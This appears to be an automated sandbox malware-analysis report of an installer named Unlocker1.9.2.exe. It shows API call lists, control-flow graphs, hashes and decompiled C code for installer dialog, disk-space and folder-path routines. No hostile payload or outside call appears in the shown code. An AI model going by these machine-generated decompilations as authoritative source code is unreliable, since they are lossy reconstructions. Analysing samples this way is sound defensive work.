                                                                                                                                                              0x00000000
                                                                                                                                                              0x004048fa
                                                                                                                                                              0x00404832

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 004046E1
                                                                                                                                                              • GetDlgItem.USER32 ref: 004046EE
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000007), ref: 0040473A
                                                                                                                                                              • LoadBitmapA.USER32 ref: 0040474D
                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404767
                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004047C7
                                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                                                                                                                                              • GetWindowLongA.USER32 ref: 00404901
                                                                                                                                                              • SetWindowLongA.USER32 ref: 0040490F
                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404920
                                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00404B0C
                                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                                                                                                                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404CAD
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404CB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                              • String ID: $M$N
                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                              • Opcode ID: 6f88420c93d77387f0f24d9c6c19e635542aef09cd36cac9f532a381c639e13e
                                                                                                                                                              • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                                                                                                                                              • Opcode Fuzzy Hash: 6f88420c93d77387f0f24d9c6c19e635542aef09cd36cac9f532a381c639e13e
                                                                                                                                                              • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004041CD Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 266stringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 492 4041cd-4041fc 493 40420b-404212 492->493 494 4041fe-404206 call 405282 call 405c3f 492->494 496 404214-40422a GetDlgItem call 40553d 493->496 497 404286-40428d 493->497 494->493 508 40423c-404279 SetWindowTextA call 403d8f * 2 call 403dc4 call 405cff 496->508 509 40422c-404234 call 405564 496->509 500 404362-404369 497->500 501 404293-404299 497->501 506 404378-40438f call 405282 call 4055b1 500->506 507 40436b-404372 500->507 504 4042b3-4042b8 501->504 505 40429b-4042a6 501->505 504->500 512 4042be-404303 call 4059ff SHBrowseForFolderA 504->512 510 4042ac 505->510 511 4044ed-4044ff call 403df6 505->511 530 404391 506->530 531 404398-4043b1 call 4059dd call 405cff 506->531 507->506 507->511 508->511 550 40427f-404284 SHAutoComplete 508->550 509->508 528 404236-404237 call 4054d0 509->528 510->504 524 404305-40431f CoTaskMemFree call 4054d0 512->524 525 40435b 512->525 537 404321-404327 524->537 538 404349-404359 SetDlgItemTextA 524->538 525->500 528->508 530->531 548 4043b3-4043b7 531->548 549 4043e8-4043f7 call 4059dd call 405564 531->549 537->538 541 404329-404340 call 4059ff lstrcmpiA 537->541 538->500 541->538 552 404342-404344 lstrcatA 541->552 553 4043e6 548->553 554 4043b9-4043cb GetDiskFreeSpaceExA 548->554 565 4043f9 549->565 566 4043fc-404415 GetDiskFreeSpaceA 549->566 550->497 552->538 553->549 556 404439-40444f 554->556 557 4043cd-4043cf 554->557 559 404454 556->559 560 4043d1 557->560 561 4043d4-4043e4 call 405517 557->561 563 404459-404463 call 40461d 559->563 560->561 561->553 561->554 572 404470-404479 563->572 573 404465-404467 563->573 565->566 569 404451 566->569 570 404417-404437 MulDiv 566->570 569->559 570->563 574 4044a6-4044b0 572->574 575 40447b-40448b call 404568 572->575 573->572 576 404469 573->576 578 4044b2-4044b9 call 40140b 574->578 579 4044bc-4044c2 574->579 584 404498-4044a1 SetDlgItemTextA 575->584 585 40448d-404491 call 404568 575->585 576->572 578->579 582 4044c4 579->582 583 4044c7-4044d8 call 403db1 579->583 582->583 590 4044e7 583->590 591 4044da-4044e0 583->591 584->574 592 404496 585->592 590->511 591->590 593 4044e2 call 404162 591->593 592->574 593->590
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004041CD(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				union _ULARGE_INTEGER _v24;
				long _v28;
				union _ULARGE_INTEGER _v32;
				intOrPtr _v36;
				long _v40;
				union _ULARGE_INTEGER _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc48; // 0x73f11c
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E00405282(0x3fb, _t162);
					E00405C3F(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405282(0x3fb, _t162);
							if(E004055B1(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E004059DD(0x41f440, _t162);
							_t145 = 0;
							_t86 = E00405CFF(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E004059DD(0x41f440, _t162);
								_t88 = E00405564(0x41f440);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f440,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f440) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = GetDiskFreeSpaceExA(0x41f440,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405517(0x41f440) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f440) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44.LowPart) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040461D(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42365c; // 0x7664ab
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404568(0x3ff, 0xfffffffb, _t94); // executed
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f430);
									} else {
										E00404568(_t163, 0xfffffffc, _t153); // executed
									}
								}
								_t95 = _v8;
								 *0x423f24 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403DB1(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420464 == _t145) {
									E00404162();
								}
								 *0x420464 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420478;
							_v56 = E00404502;
							_v52 = _t162;
							_v64 = E004059FF(0x3fb, 0x420478, _t162, 0x41f848, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004054D0(_t162);
								_t124 =  *0x423e90; // 0x73eeb0
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Program Files\\Unlocker") {
									E004059FF(0x3fb, 0x420478, _t162, 0, _t125);
									if(lstrcmpiA(0x422e20, 0x420478) != 0) {
										lstrcatA(_t162, 0x422e20);
									}
								}
								 *0x420464 =  &(( *0x420464)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040553D(_t162) != 0 && E00405564(_t162) == 0) {
						E004054D0(_t162);
					}
					 *0x423658 = _t159;
					SetWindowTextA(_v12, _t162); // executed
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403D8F(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403D8F(_t159);
					E00403DC4(_v12);
					if(E00405CFF(7) == 0) {
						L53:
						return E00403DF6(_a8, _a12, _a16);
					}
					SHAutoComplete(_v12, 1); // executed
					goto L8;
				}
			}







































                                                                                                                                                              0x004041d3
                                                                                                                                                              0x004041da
                                                                                                                                                              0x004041e6
                                                                                                                                                              0x004041f4
                                                                                                                                                              0x004041fc
                                                                                                                                                              0x00404200
                                                                                                                                                              0x00404206
                                                                                                                                                              0x00404206
                                                                                                                                                              0x00404212
                                                                                                                                                              0x00404286
                                                                                                                                                              0x0040428d
                                                                                                                                                              0x00404362
                                                                                                                                                              0x00404369
                                                                                                                                                              0x00404378
                                                                                                                                                              0x00404378
                                                                                                                                                              0x0040437c
                                                                                                                                                              0x00404382
                                                                                                                                                              0x0040438f
                                                                                                                                                              0x00404391
                                                                                                                                                              0x00404391
                                                                                                                                                              0x0040439f
                                                                                                                                                              0x004043a4
                                                                                                                                                              0x004043a7
                                                                                                                                                              0x004043ae
                                                                                                                                                              0x004043b1
                                                                                                                                                              0x004043e8
                                                                                                                                                              0x004043ea
                                                                                                                                                              0x004043f0
                                                                                                                                                              0x004043f7
                                                                                                                                                              0x004043f9
                                                                                                                                                              0x004043f9
                                                                                                                                                              0x00404415
                                                                                                                                                              0x00404451
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404417
                                                                                                                                                              0x0040441a
                                                                                                                                                              0x0040442e
                                                                                                                                                              0x00404430
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404430
                                                                                                                                                              0x004043b3
                                                                                                                                                              0x004043b7
                                                                                                                                                              0x004043e6
                                                                                                                                                              0x004043e6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004043b9
                                                                                                                                                              0x004043b9
                                                                                                                                                              0x004043c6
                                                                                                                                                              0x004043cb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004043cf
                                                                                                                                                              0x004043d1
                                                                                                                                                              0x004043d1
                                                                                                                                                              0x004043dc
                                                                                                                                                              0x004043df
                                                                                                                                                              0x004043e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004043e4
                                                                                                                                                              0x0040443f
                                                                                                                                                              0x00404446
                                                                                                                                                              0x0040444d
                                                                                                                                                              0x00404454
                                                                                                                                                              0x00404454
                                                                                                                                                              0x00404459
                                                                                                                                                              0x0040445b
                                                                                                                                                              0x00404463
                                                                                                                                                              0x00404469
                                                                                                                                                              0x00404469
                                                                                                                                                              0x00404470
                                                                                                                                                              0x00404479
                                                                                                                                                              0x00404483
                                                                                                                                                              0x0040448b
                                                                                                                                                              0x004044a1
                                                                                                                                                              0x0040448d
                                                                                                                                                              0x00404491
                                                                                                                                                              0x00404491
                                                                                                                                                              0x0040448b
                                                                                                                                                              0x004044a6
                                                                                                                                                              0x004044ab
                                                                                                                                                              0x004044b0
                                                                                                                                                              0x004044b9
                                                                                                                                                              0x004044b9
                                                                                                                                                              0x004044c2
                                                                                                                                                              0x004044c4
                                                                                                                                                              0x004044c4
                                                                                                                                                              0x004044d0
                                                                                                                                                              0x004044d8
                                                                                                                                                              0x004044e2
                                                                                                                                                              0x004044e2
                                                                                                                                                              0x004044e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004044e7
                                                                                                                                                              0x004043b1
                                                                                                                                                              0x0040436b
                                                                                                                                                              0x00404372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404372
                                                                                                                                                              0x00404293
                                                                                                                                                              0x00404299
                                                                                                                                                              0x004042b3
                                                                                                                                                              0x004042b8
                                                                                                                                                              0x004042c2
                                                                                                                                                              0x004042c9
                                                                                                                                                              0x004042d8
                                                                                                                                                              0x004042db
                                                                                                                                                              0x004042de
                                                                                                                                                              0x004042e5
                                                                                                                                                              0x004042ed
                                                                                                                                                              0x004042f0
                                                                                                                                                              0x004042f4
                                                                                                                                                              0x004042fb
                                                                                                                                                              0x00404303
                                                                                                                                                              0x0040435b
                                                                                                                                                              0x00404305
                                                                                                                                                              0x00404306
                                                                                                                                                              0x0040430d
                                                                                                                                                              0x00404312
                                                                                                                                                              0x00404317
                                                                                                                                                              0x0040431f
                                                                                                                                                              0x0040432c
                                                                                                                                                              0x00404340
                                                                                                                                                              0x00404344
                                                                                                                                                              0x00404344
                                                                                                                                                              0x00404340
                                                                                                                                                              0x00404349
                                                                                                                                                              0x00404354
                                                                                                                                                              0x00404354
                                                                                                                                                              0x00404303
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004042b8
                                                                                                                                                              0x004042a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004042ac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404214
                                                                                                                                                              0x00404214
                                                                                                                                                              0x00404220
                                                                                                                                                              0x0040422a
                                                                                                                                                              0x00404237
                                                                                                                                                              0x00404237
                                                                                                                                                              0x0040423d
                                                                                                                                                              0x00404246
                                                                                                                                                              0x0040424f
                                                                                                                                                              0x00404252
                                                                                                                                                              0x00404255
                                                                                                                                                              0x0040425d
                                                                                                                                                              0x00404260
                                                                                                                                                              0x00404263
                                                                                                                                                              0x0040426b
                                                                                                                                                              0x00404279
                                                                                                                                                              0x004044ed
                                                                                                                                                              0x004044ff
                                                                                                                                                              0x004044ff
                                                                                                                                                              0x00404284
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404284

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404219
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00404246
                                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000001,00000007,?,?,00000014,?,?,00000001,?), ref: 00404284
                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                                                                                                                                              • lstrcmpiA.KERNEL32(Remove folder: ,00420478,00000000,?,?), ref: 00404338
                                                                                                                                                              • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404344
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00404354
                                                                                                                                                                • Part of subcall function 00405282: GetDlgItemTextA.USER32 ref: 00405295
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                                                                • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                                                              • GetDiskFreeSpaceExA.KERNELBASE(C:\Program Files\,?,?,?,00000000,C:\Program Files\,?,?,000003FB,?), ref: 004043C6
                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(C:\Program Files\,?,?,0000040F,?,C:\Program Files\,C:\Program Files\,?,00000000,C:\Program Files\,?,?,000003FB,?), ref: 0040440D
                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 004044A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpi
                                                                                                                                                              • String ID: A$C:\Program Files\$C:\Program Files\Unlocker$Remove folder:
                                                                                                                                                              • API String ID: 936030579-772531688
                                                                                                                                                              • Opcode ID: f620154ea62ad6bd0c942c410229765c9d88c2cad30687c3b8eb4897cd28c5b9
                                                                                                                                                              • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                                                                                                                                              • Opcode Fuzzy Hash: f620154ea62ad6bd0c942c410229765c9d88c2cad30687c3b8eb4897cd28c5b9
                                                                                                                                                              • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004059FF Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 197stringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 662 4059ff-405a0a 663 405a0c-405a1b 662->663 664 405a1d-405a3a 662->664 663->664 665 405a40-405a47 664->665 666 405c1c-405c20 664->666 665->666 667 405c26-405c30 666->667 668 405a4c-405a56 666->668 670 405c32-405c36 call 4059dd 667->670 671 405c3b-405c3c 667->671 668->667 669 405a5c-405a63 668->669 672 405a69-405a9e 669->672 673 405c0f 669->673 670->671 675 405aa4-405aaf GetVersion 672->675 676 405bb9-405bbc 672->676 677 405c11-405c17 673->677 678 405c19-405c1b 673->678 679 405ab1-405ab5 675->679 680 405ac9 675->680 681 405bec-405bef 676->681 682 405bbe-405bc1 676->682 677->666 678->666 679->680 683 405ab7-405abb 679->683 686 405ad0-405ad7 680->686 687 405bf1-405bf8 call 4059ff 681->687 688 405bfd-405c0d lstrlenA 681->688 684 405bd1-405bdd call 4059dd 682->684 685 405bc3-405bcf call 40593b 682->685 683->680 689 405abd-405ac1 683->689 699 405be2-405be8 684->699 685->699 691 405ad9-405adb 686->691 692 405adc-405ade 686->692 687->688 688->666 689->680 695 405ac3-405ac7 689->695 691->692 697 405ae0-405afb call 4058c4 692->697 698 405b17-405b1a 692->698 695->686 707 405b00-405b03 697->707 700 405b2a-405b2d 698->700 701 405b1c-405b28 GetSystemDirectoryA 698->701 699->688 703 405bea 699->703 705 405b97-405b99 700->705 706 405b2f-405b3d GetWindowsDirectoryA 700->706 704 405b9b-405b9e 701->704 708 405bb1-405bb7 call 405c3f 703->708 704->708 711 405ba0-405ba4 704->711 705->704 710 405b3f-405b49 705->710 706->705 707->711 712 405b09-405b12 call 4059ff 707->712 708->688 715 405b63-405b79 SHGetSpecialFolderLocation 710->715 716 405b4b-405b4e 710->716 711->708 713 405ba6-405bac lstrcatA 711->713 712->704 713->708 720 405b94 715->720 721 405b7b-405b92 SHGetPathFromIDListA CoTaskMemFree 715->721 716->715 719 405b50-405b57 716->719 722 405b5f-405b61 719->722 720->705 721->704 721->720 722->704 722->715
                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E004059FF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42365c; // 0x7664ab
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423eb8; // 0x745dec
				_t74 = _t73 + _t36;
				_t37 = 0x422e20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e20;
				if(_a4 - 0x422e20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E004059FF(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E004059DD(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E0040593B(_t86,  *0x423e88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405C3F(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f04;
						if( *0x423f04 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423e84; // 0x73d81340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423e88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423e88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86); // executed
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423eb8;
							E004058C4(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423eb8, _t86, _t69 & 0x00000040); // executed
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
